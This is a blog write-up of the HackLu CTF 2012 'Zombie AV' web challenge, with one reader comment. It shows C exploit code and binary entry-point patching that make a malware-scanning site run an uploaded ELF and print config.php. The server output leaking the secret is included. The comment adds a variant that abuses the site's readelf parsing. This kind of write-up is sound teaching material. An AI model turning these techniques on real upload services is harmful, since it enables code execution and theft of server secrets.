HackLu CTF 2012 – Zombie AV (150) Write-up

2 – zombie AV
Some people try to fight the zombie apocalypse by selling pseudo antidote.
We need the secret formula in config.php to destroy their snake oil business…

Source: https://ctf.fluxfingers.net:2070/zombieav.zip
Page: https://ctf.fluxfingers.net:2070

This challenge is a web page that allows us to upload Linux ELF 32 binaries. The site will scan the uploaded executables looking for zombie viruses. If a binary is detected as infected, it will be executed on the server in order to clean it, and the output generated by the infected binary will be shown.

As we can see in the source code of scan.php, a binary is infected if it has the following entrypoint:

	/* 
	 * hint: zombie virus signature is
	 * 8048340:	b0 01                	mov    $0x1,%al
 	 * 8048342:	90                   	nop
 	 * 8048343:	90                   	nop
 	 * 8048344:	90                   	nop
  	 * 8048345:	90                   	nop
  	 * 8048346:	90                   	nop
 	 * 8048347:	90                   	nop
 	 * 8048348:	90                   	nop
  	 * 8048349:	90                   	nop
 	 * 804834a:	cd 80                	int    $0x80
	*/

So I crafted the following C code, which will read the contents of config.php, where the flag is located:

#include<stdio.h>

int main(int argc, char** argv){
	asm("mov $0x1, %al");
	asm("nop");
	asm("nop");
	asm("nop");
	asm("nop");
	asm("nop");
	asm("nop");
	asm("nop");
	asm("nop");
	asm("int $0x80");
	//Some stack adjustment
	asm("mov %esp,%ebp");
	asm("and    $0xfffffff0,%esp");
	asm("sub    $0x430,%esp");
	

	char buffer[1024];

	printf("Working...\n");

	FILE *output = popen("cat config.php", "r");

	  if (!output)
	  {
	    printf("popen error!.\n");
	    return -1;
	  }


	  while (!feof(output)){
	  	char *line_p = fgets(buffer, sizeof(buffer), output);
		  printf("-> %s", buffer);
	  }
	  pclose(output);
}

Now I need to manually modify the entrypoint of the generated ELF, since the entrypoint still begins with the prologue of the main() function generated by the compiler.
The entrypoint can be obtained with the following command:

$ readelf -h zombieav

The EntryPoint is located at offset 0x18 of the ELF file. So I’ll set it to 0x8048556, which is the address where the zombie virus signature is located:

francisco@sherminator:~$ gdb ./zombieav 
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
(gdb) disas main
Dump of assembler code for function main:
   0x08048534 <+0>:	push   %ebp
   0x08048535 <+1>:	mov    %esp,%ebp
   0x08048537 <+3>:	and    $0xfffffff0,%esp
   0x0804853a <+6>:	sub    $0x430,%esp
   0x08048540 <+12>:	mov    0xc(%ebp),%eax
   0x08048543 <+15>:	mov    %eax,0x1c(%esp)
   0x08048547 <+19>:	mov    %gs:0x14,%eax
   0x0804854d <+25>:	mov    %eax,0x42c(%esp)
   0x08048554 <+32>:	xor    %eax,%eax
   0x08048556 <+34>:	mov    $0x1,%al
   0x08048558 <+36>:	nop
   0x08048559 <+37>:	nop
   0x0804855a <+38>:	nop
   0x0804855b <+39>:	nop
   0x0804855c <+40>:	nop
   0x0804855d <+41>:	nop
   0x0804855e <+42>:	nop
   0x0804855f <+43>:	nop
   0x08048560 <+44>:	int    $0x80
   0x08048562 <+46>:	mov    %esp,%ebp
   0x08048564 <+48>:	and    $0xfffffff0,%esp
   0x08048567 <+51>:	sub    $0x430,%esp
---Type <return> to continue, or q <return> to quit---q

After uploading my crafted ELF file, I get the following output in the web page:

analysing file 33700f130a129f6c45028374ea5bc799
8048556:	b0 01                	mov    $0x1,%al
 8048558:	90                   	nop
 8048559:	90                   	nop
 804855a:	90                   	nop
 804855b:	90                   	nop
 804855c:	90                   	nop
 804855d:	90                   	nop
 804855e:	90                   	nop
 804855f:	90                   	nop
 8048560:	cd 80                	int    $0x80
 8048562:	89 e5                	mov    %esp,%ebp
 8048564:	83 e4 f0             	and    $0xfffffff0,%esp
 8048567:	81 ec 30 04 00 00    	sub    $0x430,%esp
 804856d:	c7 04 24 f0 86 04 08 	movl   $0x80486f0,(%esp)
 8048574:	e8 b7 fe ff ff       	call   8048430 <puts@plt>
 8048579:	c7 44 24 04 ff 86 04 	movl   $0x80486ff,0x4(%esp)
 8048580:	08 
 8048581:	c7 04 24 01 87 04 08 	movl   $0x8048701,(%esp)
 8048588:	e8 83 fe
Entry Opcodes are: b0 01 90 90 90 90 90 90 90 90 cd 80 
Signature is: cd53b957ec552afb39cba6daed7a9abc
found zombie virus, trying to execute it
*** stack smashing detected ***: upload/33700f130a129f6c45028374ea5bc799 terminated
======= Backtrace: =========
/lib32/libc.so.6(__fortify_fail+0x45)[0xf764d675]
/lib32/libc.so.6(+0x10362a)[0xf764d62a]
upload/33700f130a129f6c45028374ea5bc799[0x8048614]
[0xff978eb8]
======= Memory map: ========
08048000-08049000 r-xp 00000000 08:01 1713844                            /var/www/upload/33700f130a129f6c45028374ea5bc799
08049000-0804a000 r--p 00000000 08:01 1713844                            /var/www/upload/33700f130a129f6c45028374ea5bc799
0804a000-0804b000 rw-p 00001000 08:01 1713844                            /var/www/upload/33700f130a129f6c45028374ea5bc799
0855f000-08580000 rw-p 00000000 00:00 0                                  [heap]
f7526000-f7542000 r-xp 00000000 08:01 278593                             /usr/lib32/libgcc_s.so.1
f7542000-f7543000 r--p 0001b000 08:01 278593                             /usr/lib32/libgcc_s.so.1
f7543000-f7544000 rw-p 0001c000 08:01 278593                             /usr/lib32/libgcc_s.so.1
f7549000-f754a000 rw-p 00000000 00:00 0 
f754a000-f76ea000 r-xp 00000000 08:01 278151                             /lib32/libc-2.15.so
f76ea000-f76eb000 ---p 001a0000 08:01 278151                             /lib32/libc-2.15.so
f76eb000-f76ed000 r--p 001a0000 08:01 278151                             /lib32/libc-2.15.so
f76ed000-f76ee000 rw-p 001a2000 08:01 278151                             /lib32/libc-2.15.so
f76ee000-f76f2000 rw-p 00000000 00:00 0 
f76f5000-f76f8000 rw-p 00000000 00:00 0 
f76f8000-f76f9000 r-xp 00000000 00:00 0                                  [vdso]
f76f9000-f7719000 r-xp 00000000 08:01 278165                             /lib32/ld-2.15.so
f7719000-f771a000 r--p 0001f000 08:01 278165                             /lib32/ld-2.15.so
f771a000-f771b000 rw-p 00020000 08:01 278165                             /lib32/ld-2.15.so
ff958000-ff979000 rw-p 00000000 00:00 0                                  [stack]
Working...
-> <?php
-> 
-> $readelfpath='/usr/bin/readelf';
-> $objdumppath='/usr/bin/objdump';
-> $uploadpath='upload/';
-> $scriptpath='/var/www/';
-> $secret='55c4080daefb5f794c3527101882b50b';
-> 
-> ?>
-> ?>
Aborted
done we are safe

Ooops! Looks like we’ve accidentally smashed the stack, but anyways we get the key! ๐Ÿ™‚

So the flag for this challenge was: 55c4080daefb5f794c3527101882b50b.

Advertisements

2 thoughts on “HackLu CTF 2012 – Zombie AV (150) Write-up

  1. nice variant)
    I changed version value of binary (0x14-0x17 bytes) to address of “zombie virus”

    #include
    #include

    int abc() {
    __asm__(“mov $0x1, %al\n\
    nop\n\
    nop\n\
    nop\n\
    nop\n\
    nop\n\
    nop\n\
    nop\n\
    nop\n\
    int $0x80”);
    }

    int main() {
    system(“cat config.php”);
    }

    my address was 0x80483ff.

    $ readelf -h hw
    ……
    Version: 0x80483ff
    Entry point address: 0x8048300
    ……

    $output=shell_exec($readelfpath.’ -h ‘.$contents);

    $data = preg_match( ‘/0x[a-fA-F0-9]{5,8}/’, $output,$matches);
    $retValue=(hexdec($matches[0]) & 4294967288);

    this script get the first 0x******** value as EP

    Result:
    analysing file ab08a0576c07b9fd445894edcbf5921a
    80483ff: b0 01 mov $0x1,%al
    8048401: 90 nop
    8048402: 90 nop
    8048403: 90 nop
    8048404: 90 nop
    8048405: 90 nop
    8048406: 90 nop
    8048407: 90 nop
    8048408: 90 nop
    8048409: cd 80 int $0x80
    804840b: 5d pop %ebp
    804840c: c3 ret

    0804840d :
    804840d: 55 push %ebp
    804840e: 89 e5 mov %esp,%ebp
    8048410: 83 e4 f0 and $0xfffffff0,%esp
    8048413: 83 ec 10 sub $0x10,%esp
    8048416: c7 04 24 c0 84 04 08 movl $0x80484c0,(%esp)
    804841d: e8 ae fe ff ff call 80482d0
    8
    Entry Opcodes are: b0 01 90 90 90 90 90 90 90 90 cd 80
    Signature is: cd53b957ec552afb39cba6daed7a9abc
    found zombie virus, trying to execute it

    done we are safe

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s